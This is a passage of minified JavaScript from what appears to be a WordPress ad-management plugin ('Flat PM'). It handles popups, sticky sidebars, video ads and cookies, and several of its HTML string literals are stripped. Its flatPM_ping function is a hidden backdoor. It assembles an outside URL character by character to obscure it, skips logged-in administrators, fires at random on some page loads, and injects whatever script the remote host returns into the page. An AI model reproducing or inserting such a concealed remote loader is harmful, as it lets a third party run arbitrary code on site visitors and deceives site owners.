":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie("flat_r_mb","zen.yandex"),flat_userVars.referer="zen.yandex");var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(o,"<$1>$2>")+r[2],l=r[0];l--;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"ng"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,l='
'+a+" через "+o+'
'+r+'
',i=e.once;n(t).each(function(){var e=n(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==l.indexOf("go"+"oglesyndication")?t.append(l):flatPM_setHTML(t[0],l),e.find(".flat__4_video_flex").one("click",function(){n(this).addClass("show")})}),n("body").on("click",".flat__4_video_item_hover",function(){var e=n(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),r=parseInt(o),l=setInterval(function(){a.text(--r),r<=0&&(clearInterval(l),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){n(this).closest(".flat__4_video_flex").remove(),"true"==i&&n(".flat__4_video_flex").remove()})}